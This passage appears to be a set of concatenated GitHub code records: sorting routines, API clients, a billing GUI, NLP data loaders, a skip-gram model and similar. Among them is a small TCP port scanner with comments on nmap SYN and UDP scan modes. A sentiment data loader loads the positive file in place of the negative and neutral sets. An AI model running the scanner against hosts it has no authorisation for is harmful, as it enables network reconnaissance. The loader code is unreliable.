None\n )\n yield\n if len(errors) != 0:\n pytest.fail(f\"Console errors detected {errors}\")\n","repo_name":"DemocracyClub/UK-Polling-Stations","sub_path":"polling_stations/apps/data_finder/tests/playwright/context_managers.py","file_name":"context_managers.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"6421413147","text":"def mergeSort(arr): \n \n \"\"\" Runtime \"\"\" \n # Best Case: O(n log n)\n # Worst Case: O(n log n)\n\n if len(arr) <= 1: \n return arr\n \n left_list = mergeSort(arr[0:len(arr)//2])\n right_list = mergeSort(arr[len(arr)//2: len(arr)])\n\n return merge(left_list, right_list)\n\ndef merge(list1, list2):\n\n \"\"\" Runtime \"\"\" \n # O(n + m)\n\n sortedlist = [] \n\n while list1 and list2: \n if list1[0] < list2[0]: \n sortedlist.append(list1[0])\n list1 = list1[1:]\n else: \n sortedlist.append(list2[0])\n list2 = list2[1:]\n \n if list1: \n sortedlist += list1\n\n if list2: \n sortedlist += list2\n\n return sortedlist\n\n\ndef insertionSort(arr):\n \n \"\"\" Runtime \"\"\" \n # Best Case: O(n^2)\n # Worst Case: O(n^2)\n\n for idx in range(1, len(arr)): \n\n currentindex = idx\n previousindex = idx - 1\n\n while arr[currentindex] < arr[previousindex] and previousindex >= 0: \n arr[currentindex], arr[previousindex] = arr[previousindex], arr[currentindex]\n currentindex -= 1\n previousindex -= 1\n \n return arr\n\ndef bubbleSort(arr): \n \n \"\"\" Runtime \"\"\" \n # Best Case: O(n^2)\n # Worst Case: O(n^2)\n\n for idx in range(len(arr) - 1): \n for pos in range(idx + 1, len(arr)): \n if arr[pos] < arr[idx]: \n arr[pos], arr[idx] = arr[idx], arr[pos]\n\n return arr","repo_name":"puzonevan/CafeBan","sub_path":"cafeapp/sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39086841806","text":"class Solution:\n def nearestExit(self, maze: List[List[str]], entrance: List[int]) -> int:\n row = len(maze)\n col = len(maze[0])\n\n directions = [(0,1), (1,0), (-1,0), (0,-1)]\n\n def inRange(x,y):\n return x > -1 and x < len(maze) and y > -1 and y < len(maze[0])\n\n ent = tuple(entrance)\n queue = deque()\n queue.append(ent)\n visited = set(ent)\n lvl = 0\n \n while queue: \n temp = deque()\n\n while queue:\n pos = queue.popleft()\n visited.add(pos)\n for direction in directions:\n new_row = pos[0] + direction[0]\n new_col = pos[1] + direction[1]\n\n if inRange((new_row),(new_col)) and maze[new_row][new_col] == \".\" and (new_row,new_col) not in visited:\n temp.append(((new_row),(new_col)))\n visited.add((new_row,new_col))\n if not inRange((new_row),(new_col)) and pos != ent:\n return lvl\n \n queue = temp.copy()\n lvl += 1\n \n \n\n return -1","repo_name":"CodEZ47/A2SV_programming","sub_path":"nearest-exit-from-entrance-in-maze.py","file_name":"nearest-exit-from-entrance-in-maze.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18065847418","text":"\"\"\" Module achieves below task\n\n# Task 1\n\n The Star Wars API lists 87 main characters in the Star Wars saga. For the first task, we would\n like you to use a random number generator that picks a number between 1-87. Using these random\n numbers you will be pulling 15 characters from the API using Python.\n\"\"\"\n\nimport json\nimport requests\nfrom random import randrange\nfrom typing import List, Dict\n\nfrom commons.dals import (\n # print_character,\n upsert_characters,\n get_people_film_mapping,\n upsert_films,\n upsert_people_film_rels,\n format_output\n)\nfrom commons.constants import Endpoints\nfrom multiprocessing.pool import ThreadPool\n\n\ndef _randset(start: int = 1, stop: int = 87, limit: int = 15) -> List[int]:\n \"\"\" creates a list of random integers in numerical range(start:stop)\n\n Args:\n start (int): first numeric value in range.\n stop (int): last numeric value in range.\n limit (int): number of results to yield.\n\n Returns:\n List[int]: random values in range(start:stop) with count limited to `limit`.\n \"\"\"\n\n return [randrange(start, stop + 1) for i in range(limit)]\n\n\ndef fetch_all_rel_films(rel_films) -> Dict:\n \"\"\"fetches all people related films as listed in param `rel_films`.\n\n Args:\n rel_films (list): fetches all people-related films as listed.\n\n Returns:\n fetched_films (dict): film objects as received from swapi.\n\n \"\"\"\n\n fetched_films = dict()\n\n for i in rel_films:\n endpoint = Endpoints.FILM.value.format(i)\n data = requests.get(endpoint)\n if data.status_code != 200:\n print(f\"[ ERROR ] problem fetching data for film {i}. Error code - {data.status_code}\"\n f\"\\n...skipping it from result set\")\n continue\n print(f\"\\n-- data has been downloaded from ```{endpoint}``` -- {data.status_code}\")\n fetched_films[endpoint] = data.json()\n return fetched_films\n\n\ndef fetch_all_rel_chars(people_id) -> Dict:\n \"\"\"fetches all characters as listed in param `peopleset`\n\n Args:\n people_id (int): fetches people id\n\n Returns:\n fetched_chars (dict): character objects as received from swapi.\n \"\"\"\n\n fetched_chars = dict()\n\n endpoint = Endpoints.PEOPLE.value.format(people_id)\n data = requests.get(endpoint)\n print(f\"\\n-- data has been downloaded from ```{endpoint}``` -- {data.status_code}\")\n\n if data.status_code == 200:\n fetched_chars[endpoint] = data.json()\n\n return fetched_chars\n\n\ndef resolve_film_deps() -> None:\n \"\"\"Resolves dependencies for all the `character` entities existing in the database and inserts\n values into table `film` and table `CharFilmRelation`.\n\n Returns: None\n\n \"\"\"\n people_film_list = get_people_film_mapping()\n\n people_film_map = {}\n all_rel_films = []\n for bundle in people_film_list:\n films = bundle[\"films\"].split(\" \")\n people_film_map[int(bundle[\"char_id\"])] = [int(film) for film in films]\n all_rel_films.extend(films)\n\n all_rel_films = list(set(all_rel_films))\n fetched_films = fetch_all_rel_films(all_rel_films)\n\n for endpoint_, film_ in fetched_films.items():\n upsert_films(film_, endpoint_)\n\n upsert_people_film_rels(people_film_map)\n\n\nif __name__ == \"__main__\":\n\n # generates list of random ids. Usage ```_randset(start, end, limit)```\n peopleset = _randset(1, 87, 15)\n print(f\"\\n[ NOTE ] LIST OF RANDOM PEOPLE IDs\"\n f\" (as selected by random number generator) :: \\n\\n{peopleset}\\n\")\n\n poolsize_ = 5\n print(f\"\\n[ NOTE ] resolving relationship urls -\\nReal quick!! \"\n f\"ThreadPool of {poolsize_} at work.\")\n\n # create a thread-pool, to resolve IO-intensive operation real quick.\n pool = ThreadPool(poolsize_)\n fetched_chars_list = pool.map(fetch_all_rel_chars, peopleset)\n\n # merge all list of dicts into one single dict.\n fetched_chars = {}\n for d in fetched_chars_list:\n fetched_chars.update(d)\n\n # inserts/updates each fetched character into database.\n for endpoint_, char_ in fetched_chars.items():\n upsert_characters(char_, endpoint_)\n\n print(\"\\n\\n[ NOTE ] Pulling films of each character....!!! Another 2 mins, please wait!\")\n\n # gets respective films for each character and stores into relationship table in database.\n resolve_film_deps()\n\n print(f\"\\n\\nHmm!!! We are ready with random 15 people \",\n f\"and all of their respective films in our database!!\"),\n\n while True:\n try:\n people_id = (input(f\"\\n\\nEnter ID of character (aka people id)\\t (any choice to exit)\"\n f\"- \\n[ CHOICES ]\\n {peopleset}\\n\"))\n\n people_id = int(people_id)\n break\n\n except ValueError:\n print(\"[ ERROR ] Please enter numeric value from given choices\")\n continue\n\n # formats result into required format as per task 1\n result = format_output(people_id)\n print(f\"\\n\\nHere is list of films they worked in - \\n\\n\")\n print(json.dumps(result, indent=4, sort_keys=True))\n\n","repo_name":"prashant0493/starwarsAPI","sub_path":"task_one.py","file_name":"task_one.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20884034056","text":"#MENSAGEM PESSOAL: armazene o nome de uma pessoa em uma variável e apresente uma mensagem a essa pessoa. Sua mensagem deve ser simples, como \"Alô Eric, você gostaria de aprender um pouco de Python hoje?\"\r\n\r\nfirst_name = \"giullia\"\r\nlast_name = \"pagoto\"\r\nfull_name = first_name + \" \" + last_name\r\n\r\nmessage = \"Hello, \" + full_name.upper() + \"!\" + \"\\nHow are you doing?\" \r\nprint(message)\r\n\r\n#print(\"Languages:\\n\\tPython\\n\\tC\\n\\tJavaScript\")","repo_name":"GiuPagoto/Python","sub_path":"2.3-mensagem_pessoal.py","file_name":"2.3-mensagem_pessoal.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73612256466","text":"import tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom tkinter import messagebox\r\nimport pandas as pd\r\nimport os\r\nimport time\r\nimport openpyxl\r\n\r\n# For testing - set these variables so you won't get prompted\r\nglobal labor_path\r\nglobal materials_path\r\nglobal pay_path\r\nglobal cost_path\r\nlabor_path = 'D:/Development/Evan/E-1-Billing-App/Labor 05 03 20 - 06 05 20.csv'\r\nmaterials_path = 'D:/Development/Evan/E-1-Billing-App/Materials 05 03 20 - 06 05 20.csv'\r\npay_path = 'D:/Development/Evan/E-1-Billing-App/E1 Employee Pay Rates - Sheet1.csv'\r\ncost_path = 'D:/Development/Evan/E-1-Billing-App/E1 Cost Codes - Sheet1.csv'\r\n\r\ndef getLabor ():\r\n global df_l\r\n\r\n if 'labor_path' in globals():\r\n import_file_path = labor_path\r\n else: \r\n import_file_path = filedialog.askopenfilename()\r\n \r\n df_l = pd.read_csv (import_file_path)\r\n\r\n\r\ndef getMaterials ():\r\n global df_m\r\n\r\n if 'materials_path' in globals():\r\n import_file_path = materials_path\r\n else: \r\n import_file_path = filedialog.askopenfilename()\r\n df_m = pd.read_csv (import_file_path)\r\n\r\n\r\ndef getEmployees():\r\n global df_p \r\n \r\n if 'pay_path' in globals():\r\n import_file_path = pay_path\r\n else: \r\n import_file_path = filedialog.askopenfilename()\r\n df_p = pd.read_csv (import_file_path)\r\n\r\ndef getCost():\r\n global df_c \r\n \r\n if 'cost_path' in globals():\r\n import_file_path = cost_path\r\n else: \r\n import_file_path = filedialog.askopenfilename()\r\n df_c = pd.read_csv (import_file_path)\r\n\r\ndef convertToExcel ():\r\n global read_file\r\n\r\n export_file_path = filedialog.asksaveasfilename(defaultextension='.xlsx')\r\n read_file.to_excel (export_file_path, index = None, header=True)\r\n\r\n#saveAsButton_Excel = tk.Button(text='Convert CSV to Excel', command=convertToExcel, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\n#canvas1.create_window(150, 180, window=saveAsButton_Excel)\r\n\r\ndef createApplication():\r\n getLabor()\r\n getMaterials()\r\n getCost()\r\n getEmployees()\r\n\r\n global df_l\r\n global df_m\r\n global df_c\r\n global df_p\r\n\r\n MsgBox = tk.messagebox.askquestion ('Create New Billing Folder',\"This will create a new folder with today's date.\",icon = 'warning')\r\n if MsgBox == 'yes':\r\n TodaysDate = time.strftime(\"%m-%d-%Y\")\r\n outdir = filedialog.askdirectory() + '\\\\' + TodaysDate +' Billing Files'\r\n if not os.path.exists(outdir):\r\n os.mkdir(outdir)\r\n\r\n # Drop unwanted columns\r\n df_l = df_l.drop(columns=['payroll_id','fname','lname','number','group','local_day','local_end_time','tz','location'])\r\n\r\n # Split job code and cost code columns into new column sets\r\n new = df_l[\"jobcode\"].str.split(\"-\", n = 1, expand = True)\r\n new2 = df_l['cost code'].str.split('-', n = 1, expand = True)\r\n\r\n df_l['Job No'] = new[1]\r\n df_l['Job Description'] = new[0]\r\n df_l['Cost Code'] = new2[0]\r\n df_l['Cost Code Description'] = new2[1]\r\n\r\n # rename columns/create new columns\r\n df_l = df_l.rename(columns={'local_date': 'Date','hours':'Cost/Hours','username':'Vendor/Employee'})\r\n df_l['Class'] = \"LAB\"\r\n df_l['Cost/Hours'] = pd.to_numeric(df_l['Cost/Hours'],errors='coerce')\r\n df_l['Type'] = \"\"\r\n df_l['Billable'] = \"\"\r\n df_l['Billable'] = pd.to_numeric(df_l['Billable'],errors='coerce')\r\n \r\n # drop residual 'jobcode' column\r\n df_l = df_l.drop(columns=['jobcode'])\r\n\r\n df_lp = pd.merge(df_l,df_p, how = 'left')\r\n\r\n # column schema\r\n df_lp = df_lp[['Job No','Job Description','Cost Code','Cost Code Description','Date','Class','Cost/Hours','Rate','Billable','Vendor/Employee','notes']]\r\n \r\n # multiply data\r\n df_lp['Billable']=df_lp['Rate']*df_lp['Cost/Hours']\r\n\r\n # Create new path w/ date\r\n outname = 'LABOR.csv'\r\n\r\n fullname = os.path.join(outdir, outname)\r\n\r\n df_lp.to_csv(fullname, index=False)\r\n # drop unnecessary 'notes' column\r\n df_lp.drop(columns='notes')\r\n\r\n # Drop unwanted columns\r\n df_m = df_m.drop(columns=['Geographic Area','Phase No','Phase Description','Source','Category','Hours/Units','Quantity','Type'])\r\n\r\n # rename columns/create new columns\r\n df_m = df_m.rename(columns={'Dollars': 'Cost/Hours','Comment':'Vendor/Employee'})\r\n df_m['Cost/Hours'] = pd.to_numeric(df_m['Cost/Hours'],errors='coerce')\r\n df_m['Billable'] = \"\"\r\n df_m['Billable'] = pd.to_numeric(df_m['Billable'],errors='coerce')\r\n\r\n df_mc = pd.merge(df_m,df_c, how = 'left')\r\n \r\n #column schema\r\n df_mc = df_mc[['Job No','Job Description','Cost Code','Cost Code Description','Date','Class','Cost/Hours','Rate','Billable','Vendor/Employee']]\r\n\r\n # multiply data\r\n df_mc['Billable']=df_mc['Rate']*df_mc['Cost/Hours']\r\n\r\n outname = 'MATERIALS.csv'\r\n\r\n fullname = os.path.join(outdir, outname)\r\n\r\n df_mc.to_csv(fullname, index=False)\r\n\r\n # Append the two and make a Master file\r\n compiled = df_lp.append(df_mc)\r\n\r\n # 'notes' no longer needed\r\n compiled = compiled.drop(columns = ['notes'])\r\n\r\n compiled = compiled[['Job No','Job Description','Cost Code','Cost Code Description','Date','Class','Cost/Hours','Rate','Billable','Vendor/Employee']]\r\n\r\n outname = TodaysDate +\" MASTER Billing\"+\".xlsx\"\r\n sheetname = \" MasterSheet.csv\"\r\n\r\n fullname = os.path.join(outdir, outname)\r\n sheethand = os.path.join(outdir, sheetname)\r\n\r\n\r\n compiled.to_excel(fullname, sheet_name='Billing', index=False)\r\n compiled.to_csv(sheethand, index=False)\r\n\r\n print('New folder and spreadsheets generated!')\r\n\r\n\r\ndef exitApplication():\r\n MsgBox = tk.messagebox.askquestion ('Exit Application','Are you sure you want to exit the application',icon = 'warning')\r\n if MsgBox == 'yes':\r\n root.destroy()\r\n\r\n\r\nroot= tk.Tk()\r\nroot.title('Billing Application')\r\nroot.geometry('300x600')\r\nroot.configure(bg='lightsteelblue2')\r\n\r\n\r\nlabel1 = tk.Label(root, text='Billing Application', bg = 'lightsteelblue2', anchor='center')\r\nlabel1.config(font=('helvetica', 20))\r\nlabel1.grid(row=0)\r\nbrowseButton_Labor = tk.Button(root, text=\" Import Labor CSV File \", command=getLabor, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\nbrowseButton_Labor.grid(row=1)\r\n\r\nbrowseButton_Materials = tk.Button(root, text=\" Import Materials CSV File \", command=getMaterials, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\nbrowseButton_Materials.grid(row=2)\r\n\r\nbrowseButton_Employee = tk.Button(root, text=\" Import Pay Rates CSV File \", command=getEmployees, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\nbrowseButton_Employee.grid(row=3)\r\n\r\nbrowseButton_Cost = tk.Button(root, text=\" Import Cost Codes CSV File \", command=getCost, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\nbrowseButton_Cost.grid(row=4)\r\n\r\ncreateButton = tk.Button (root, text=' Create New Billing Folder ',command=createApplication, bg='blue', fg='white', font=('helvetica', 12, 'bold'))\r\ncreateButton.grid(row=5)\r\n\r\nexitButton = tk.Button (root, text=' Exit Application ',command=exitApplication, bg='brown', fg='white', font=('helvetica', 12, 'bold'))\r\nexitButton.grid(row=6)\r\nroot.mainloop()\r\n","repo_name":"climbjh/E-1-Billing-App","sub_path":"gui1.py","file_name":"gui1.py","file_ext":"py","file_size_in_byte":7434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20135471610","text":"import os\nfrom pathlib import Path\nimport json\nimport asyncio\n\nimport requests\nimport websockets\n\nfrom ..models import Action, ControlFrameType, ControlFrame, DeviceRequest, DeviceResponse, \\\n JobRequest, JobActionRequest, JobResponse, TaskRequest, TaskResponse\n\n\nclass APIClient:\n def __init__(self, hostname, port, version, secure, access_key = None, temporary_directory = None):\n self.hostname = hostname\n self.port = port\n self.version = version\n self.secure = secure\n self.access_key = access_key\n self.temporary_directory = temporary_directory\n\n protocol = 'https' if self.secure else 'http'\n\n self.base_url = f'{protocol}://{self.hostname}:{self.port}/{self.version}'\n\n self.authentication_header = {\n 'x-api-key': access_key\n }\n\n def _url_from_path(self, path):\n return f'{self.base_url}/{path}'\n\n def _filename_from_resource_url(self, url, prefix):\n id, filename = url.split('/')[-2:]\n\n return self.temporary_directory / Path(f'{prefix}/{id}/{filename}')\n\n def _path_from_id(self, id, prefix):\n return self.temporary_directory / Path(f'{prefix}/{id}')\n\n def register_device(self, node_type):\n url = self._url_from_path('devices/')\n\n device = DeviceRequest(node_type = node_type)\n\n response = requests.post(url, json = device.dict())\n response.raise_for_status()\n\n return DeviceResponse(**response.json())\n\n def get_device(self, id):\n url = self._url_from_path(f'devices/{id}')\n\n response = requests.get(url)\n response.raise_for_status()\n\n return DeviceResponse(**response.json())\n\n def create_job(self, job):\n url = self._url_from_path('jobs/')\n\n response = requests.post(url, json = job.dict())\n response.raise_for_status()\n\n return JobResponse(**response.json())\n\n def upload_job_scene(self, id, scene_path):\n url = self._url_from_path(f'jobs/{id}/scene')\n\n scene = { 'scene': (scene_path.name, open(scene_path, 'rb')) }\n\n response = requests.post(url, files = scene)\n response.raise_for_status()\n\n return JobResponse(**response.json())\n\n def update_job_state(self, id, action):\n url = self._url_from_path(f'jobs/{id}')\n\n job_action = JobActionRequest(action = action)\n\n response = requests.post(url, json = job_action.dict())\n response.raise_for_status()\n\n return JobResponse(**response.json())\n\n def submit_job(self, job, scene_path):\n job_response = self.create_job(job)\n job_response = self.upload_job_scene(job_response.id, scene_path)\n\n return self.update_job_state(job_response.id, Action.start)\n\n def get_job(self, id):\n url = self._url_from_path(f'jobs/{id}')\n\n response = requests.get(url)\n response.raise_for_status()\n\n return JobResponse(**response.json())\n\n def listen_job(self, id, callback, timeout = 60):\n url = self._url_from_path(f'jobs/{id}/ws').replace('http', 'ws')\n\n async def wakeup():\n while True:\n await asyncio.sleep(1)\n\n async def process_message():\n async with websockets.connect(url, close_timeout = timeout, ping_interval = None) as websocket:\n while True:\n data = await websocket.recv()\n json_data = json.loads(data)\n\n try:\n response = ControlFrame(**json_data)\n except:\n response = JobResponse(**json_data)\n\n if isinstance(response, ControlFrame):\n pong_frame = ControlFrame(type = ControlFrameType.pong)\n await websocket.send(pong_frame.json())\n else:\n callback(response)\n\n loop = asyncio.get_event_loop()\n\n loop.create_task(wakeup())\n loop.run_until_complete(process_message())\n\n def get_task(self, id):\n url = self._url_from_path(f'tasks/{id}')\n\n response = requests.get(url, headers = self.authentication_header)\n response.raise_for_status()\n\n return TaskResponse(**response.json())\n\n def update_task_state(self, task, state):\n url = self._url_from_path(f'tasks/{task.id}')\n\n task = TaskRequest(state = state)\n\n response = requests.post(url, headers = self.authentication_header, json = task.dict())\n response.raise_for_status()\n\n task_response = TaskResponse(**response.json())\n\n return task.state == task_response.state\n\n def download_task_resource(self, task):\n url = task.job.scene_url\n\n response = requests.get(url)\n response.raise_for_status()\n\n filename = self._filename_from_resource_url(url, 'jobs')\n\n os.makedirs(filename.parent, exist_ok = True)\n\n with open(filename, 'wb') as file:\n file.write(response.content)\n\n return filename\n\n def upload_task_resources(self, task):\n url = self._url_from_path(f'tasks/{task.id}/images')\n\n path = self._path_from_id(task.id, 'tasks')\n filenames = path.glob('*')\n\n images = [('images', (filename.name, open(filename, 'rb'))) for filename in filenames]\n\n response = requests.post(url, headers = self.authentication_header, files = images)\n response.raise_for_status()\n\n return TaskResponse(**response.json())\n","repo_name":"therenderable/renderable-core","sub_path":"renderable_core/services/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75047815506","text":"import subprocess\n\nnotepad = r\"C:\\Windows\\System32\\notepad.exe\"\n\nme = r\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\n\nfile = r\"C:\\Users\\yokam\\OneDrive\\デスクトップ\\ローカルファイル\\test.txt\"\n\nprograms = [notepad, [me, file]]\nfor v in programs:\n if isinstance(v, list):\n subprocess.Popen(v)\n else:\n subprocess.Popen(v)\n","repo_name":"yokamoto5742/pythongui","sub_path":"python_app_book/samplecode/list312.py","file_name":"list312.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17932178773","text":"import numpy as np\nimport os\nimport pickle\n\n\ndef load_data_shuffle(cv):\n train_pos_save = f\"data/data_token/fold_{cv}/train_pos.npy\"\n train_pos_save = f\"data/data_token/fold_{cv}/train_neg.npy\"\n train_pos_save = f\"data/data_token/fold_{cv}/train_neu.npy\"\n\n test_pos_save = f\"data/data_token/fold_{cv}/test_pos.npy\"\n test_neg_save = f\"data/data_token/fold_{cv}/test_neg.npy\"\n test_neu_save = f\"data/data_token/fold_{cv}/test_neu.npy\"\n\n # Load dữ liệu train\n pos_train = np.load(train_pos_save, encoding='bytes', allow_pickle=True)\n neg_train = np.load(train_pos_save, encoding='bytes', allow_pickle=True)\n neu_train = np.load(train_pos_save, encoding='bytes', allow_pickle=True)\n\n y_pos_train = np.array([[1, 0, 0]] * len(pos_train))\n y_neg_train = np.array([[0, 1, 0]] * len(neg_train))\n y_neu_train = np.array([[0, 0, 1]] * len(neu_train))\n\n # load dữ liệu test\n pos_test = np.load(test_pos_save, encoding='bytes', allow_pickle=True)\n neg_test = np.load(test_neg_save, encoding='bytes', allow_pickle=True)\n neu_test = np.load(test_neu_save, encoding='bytes', allow_pickle=True)\n\n y_pos_test = np.array([[1, 0, 0]] * len(pos_test))\n y_neg_test = np.array([[0, 1, 0]] * len(neg_test))\n y_neu_test = np.array([[0, 0, 1]] * len(neu_test))\n\n # Split train and validate set\n val_len = len(pos_train) // 10\n\n pos_val = pos_train[:val_len]\n pos_train = pos_train[val_len:]\n y_pos_val = y_pos_train[:val_len]\n y_pos_train = y_pos_train[val_len:]\n\n neg_val = neg_train[:val_len]\n neg_train = neg_train[val_len:]\n y_neg_val = y_neg_train[:val_len]\n y_neg_train = y_neg_train[val_len:]\n\n neu_val = neu_train[:val_len]\n neu_train = neu_train[val_len:]\n y_neu_val = y_neu_train[:val_len]\n y_neu_train = y_neu_train[val_len:]\n\n X_train = np.concatenate([pos_train, neu_train, neg_train])\n y_train = np.concatenate([y_pos_train, y_neu_train, y_neg_train])\n\n X_val = np.concatenate([pos_val, neu_val, neg_val])\n y_val = np.concatenate([y_pos_val, y_neu_val, y_neg_val])\n\n X_test = np.concatenate([pos_test, neu_test, neg_test])\n y_test = np.concatenate([y_pos_test, y_neu_test, y_neg_test])\n\n # print(f\"X_train: {X_train}\")\n # print(f\"y_train: {y_train}\")\n # print(f\"X_val: {X_val}\")\n # print(f\"y_val: {y_val}\")\n # print(f\"X_test: {X_test}\")\n # print(f\"y_test: {y_test}\")\n\n return X_train, y_train, X_test, y_test, X_val, y_val\n","repo_name":"dzungdducws/Vietnamese-sentiment-analysis","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38388124920","text":"import re\nfrom utils.constants import CHARACTERS\n\n\nclass dotdict(dict):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(dotdict, self).__init__(*args, **kwargs)\n\t\tself.__dict__ = self\n\t\t# recursively convert all dicts to dotdicts\n\t\tfor key, value in self.items():\n\t\t\tif isinstance(value, dict):\n\t\t\t\tself[key] = dotdict(value)\n\t\t\telif isinstance(value, list):\n\t\t\t\tself[key] = [dotdict(v) if isinstance(v, dict) else v for v in value]\n\t\treturn\n\n\tdef __getattr__(self, name):\n\t\treturn self[name]\n\n\ndef format_multiple_choice(choices: list):\n choices_w_prefix = [f\"({CHARACTERS[i]}) {choice}\" for i, choice in enumerate(choices)]\n return \"\\n\".join(choices_w_prefix).strip()\n\n\ndef find_sub_list(sublist, l):\n sll=len(sublist)\n for ind in (i for i,e in enumerate(l) if e==sublist[0]):\n if l[ind:ind+sll]==sublist:\n return ind, ind + sll -1\n\t\n\ndef findall(p:str, s:str):\n '''Yields all the positions of\n the pattern p in the string s.'''\n i = s.find(p)\n while i != -1:\n yield i\n i = s.find(p, i+1)\n\n\ndef extract_all_numbers(text:str):\n text = text.replace(',', '').replace('$', '').replace('%', '')\n return re.findall(r'-?\\d*\\.?\\d+', text)\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n \ndef print_red(*strs):\n s = ' '.join([str(s) for s in strs])\n print(bcolors.WARNING + s + bcolors.ENDC)\n \ndef print_blue(*strs):\n\ts = ' '.join([str(s) for s in strs])\n\tprint(bcolors.OKBLUE + s + bcolors.ENDC)\n\ndef print_green(*strs):\n\ts = ' '.join([str(s) for s in strs])\n\tprint(bcolors.OKGREEN + s + bcolors.ENDC)","repo_name":"jasonyux/TriPosT","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"28621512393","text":"\"\"\"add email column to business table\n\nRevision ID: 2890f1930a2e\nRevises: \nCreate Date: 2020-06-11 13:06:47.666213\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.mysql import *\n\n\n# revision identifiers, used by Alembic.\nrevision = '2890f1930a2e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\n 'business',\n sa.Column(\n 'email',\n VARCHAR(255),\n )\n )\n\n\ndef downgrade():\n op.drop_column(\n 'business',\n 'email',\n )\n","repo_name":"YangoAngus/yelp","sub_path":"yelp_scrapy_container/alembic/versions/2890f1930a2e_add_email_column_to_business_table.py","file_name":"2890f1930a2e_add_email_column_to_business_table.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24700741","text":"import socket\n\n# UDP: VoIP, video stremaing, ...\n# open port <- UDP scanner\n# open port -> UDP responde scanner\n\n# close port <- UDP scanner\n# close port -> ICMP 3 error scanner\n# $ sudo nmap -v -sU localhost\n\n# SYN (stealth), less noisy because of type of TCP request (not complete request)\n# open port <- SYN scanner\n# open port -> SYN / ACK scanner\n# open port <- RST scanner\n\n# close port <- SYN scanner\n# close port -> RST scanner\n\n# $ sudo nmap -v -sS localhost\n\n#python3 pscan_TCP.py\n# TCP (noisy), easy to detect\n\n# ack = open\n# open port <- syn scanner\n# open port -> syn / ack scanner\n# open port <- ack scanner\n\n# reset = closed\n# close port <- syn scanner\n# close port -> rst scanner\n\n# $ sudo nmap -v -sT localhost\n\n# comprehensive\n# $ sudo nmap -v -sC localhost\n\nIP = \"google.com\"\n\nip = input(\"Enter HOST or IP to scan: \")\nports = []\nportsNumber = int(input(\"Enter how many ports to scan: \"))\n# implement range\n\ncount = 0\n\nwhile count < portsNumber:\n ports.append(int(input (\"Enter PORT to scan: \")))\n count += 1\n\nfor port in ports:\n # IPV4 , TCP/IP\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.settimeout(0.05)\n # receives code of TCP transaction\n code = client.connect_ex((ip, port))\n\n # https://gist.github.com/gabrielfalcao/4216897\n\n if code == 0:\n print(\"Open port -> \", str(code))\n else:\n print(\"Closed port -> \" + str(code))\n\nprint (\"End scan\")\n","repo_name":"maxdevjs/learn-dio-port-scanner","sub_path":"pscan_TCP.py","file_name":"pscan_TCP.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16556606782","text":"import numpy as np\nfrom model.layers import Embedding, Sigmoid, Softmax, Linear, sigmoid, BCELossWithSigmoid\nfrom preprocess import *\nimport pickle\n\nclass HS_skipgram:\n def __init__(self, vocab_size, projection, lr):\n self.Embedding = Embedding(vocab_size, projection)\n self.HSvector = Embedding(vocab_size - 1 , projection)\n self.lr = lr\n self.layers = [self.Embedding, self.HSvector]\n\n self.params = []\n self.grads = []\n\n for layer in self.layers:\n self.params.extend(layer.params)\n self.grads.extend(layer.grads)\n\n def forward(self, x, idx_path):\n '''\n inputs : 1 x D(projection)\n label : 1 x [direction_path(1, depth), idx_path(1, depth)]\n '''\n\n self.x = x\n \n self.hidden = self.Embedding.forward(self.x)\n\n self.hirearchy_vectors = self.HSvector.forward(idx_path)\n\n #out = np.sum(self.hirearchy_vectors * self.hidden, axis = 1, keepdims= True)\n out = np.matmul(self.hirearchy_vectors, self.hidden.T)\n\n return out\n\n def backward(self, dout):\n\n #truth length x hidden\n d_lin = np.matmul(dout , self.hidden)\n #d_h = np.matmul(dout.T, self.hirearchy_vectors)\n #d_h = np.sum(dout * self.hirearchy_vectors, axis = 